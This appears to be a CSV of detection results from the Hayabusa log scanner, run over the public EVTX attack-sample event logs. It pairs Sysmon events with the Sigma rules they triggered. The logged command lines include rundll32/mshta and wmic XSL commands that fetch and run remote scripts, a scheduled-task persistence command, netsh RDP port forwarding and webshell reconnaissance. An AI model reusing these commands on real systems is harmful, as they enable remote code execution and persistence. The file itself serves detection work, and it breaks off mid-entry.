File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 
365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3944 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\test.bat | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3176 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c test.bat | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3944 | PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.474 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c pause | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3176 | PGUID: 
365ABB72-47BB-5CE3-0000-00108CAD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.518 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /c test.bat | LID: 0xc796 | PID: 3168 | PGUID: 365ABB72-47BB-5CE3-0000-001053AF3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:07.870 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3936 | PGUID: 365ABB72-47BB-5CE3-0000-001019C53E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.279 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2596 | PGUID: 365ABB72-47BC-5CE3-0000-00107DDD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.728 +09:00,IEWIN7,1,info,,Process Created,"Cmd: 
""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3860 | PGUID: 365ABB72-47BC-5CE3-0000-001044EE3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:08.728 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2236 | PGUID: 365ABB72-47BC-5CE3-0000-0010C6F03E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:10.161 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3920 | PGUID: 
365ABB72-47BE-5CE3-0000-0010CF0C3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 09:35:12.705 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3372 | PGUID: 365ABB72-47C0-5CE3-0000-00108D243F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xc796 | PID: 1532 | PGUID: 365ABB72-1A29-5CE4-0000-001054E32101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\rundll32.exe | 
User: IEWIN7\IEUser | Parent Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2920 | PGUID: 365ABB72-1A29-5CE4-0000-00107BE42101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.286 +09:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Evas | 
Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.389 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49703 (IEWIN7..home) | Dst: 108.179.232.58:443 (gator4243.hostgator.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | LID: 0xc796 | PID: 3772 | PGUID: 365ABB72-1A2B-5CE4-0000-00102F502201",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious 
Program,,rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:32:59.809 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\MSOFFICE_ | Process: C:\Windows\system32\svchost.exe | PID: 856 | PGUID: 365ABB72-39CB-5CE3-0000-0010E0AC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:33:00.140 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49704 (IEWIN7..home) | Dst: 105.73.6.112:80 (aka112.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 00:33:01.141 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49705 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 13:02:11.307 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2 | LID: 0xf05d | 
PID: 2888 | PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx +2019-05-22 13:02:11.307 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Program Files\Internet Explorer\iexplore.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3156 | Src PGUID: 365ABB72-C9C1-5CE4-0000-00100B222E00 | Tgt PID: 2888 | Tgt PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,info,,Process Created,"Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.862 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon 
Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wbem\WMIC.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:07.731 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\x50IGVBRfr55_test[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:08.208 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49167 (IEWIN7..home) | Dst: 45.76.12.27:443 (45-76-12-27.static.afterburst.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:08.422 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: wmic process list 
/format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | LID: 0xf347 | PID: 4056 | PGUID: 365ABB72-CF04-5CE6-0000-001010F20C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:09.576 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49168 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:50:44.582 +09:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 708 | PGUID: 365ABB72-CF64-5CE6-0000-0010CBD51100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 02:26:08.716 +09:00,IEWIN7,1,info,,Process Created,"Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | Process: \\vboxsrv\HTools\msxsl.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xf347 | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:08.947 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: 
C:\Windows\System32\msxml3.dll | Process: \\vboxsrv\HTools\msxsl.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:09.437 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | LID: 0xf347 | PID: 2240 | PGUID: 365ABB72-D7B1-5CE6-0000-00102CD76D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:45:34.538 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf347 | PID: 712 | PGUID: 365ABB72-DC3E-5CE6-0000-00102BC97200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,info,,Process Created,"Cmd: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 | Process: C:\Windows\System32\netsh.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 4088 | PGUID: 365ABB72-DC5C-5CE6-0000-001066E27200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,LatMov | Evas | C2,Netsh Port 
Forwarding,,rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,LatMov | Evas | C2,Netsh RDP Port Forwarding,,rules/sigma/process_creation/proc_creation_win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 10:33:53.112 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" /c net user | Process: C:\Windows\System32\cmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x9cf992 | PID: 2404 | PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,rules/sigma/process_creation/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.122 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: c:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2580 | Src PGUID: 365ABB72-49D6-5CE7-0000-001020A7A700 | Tgt PID: 2404 | Tgt PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
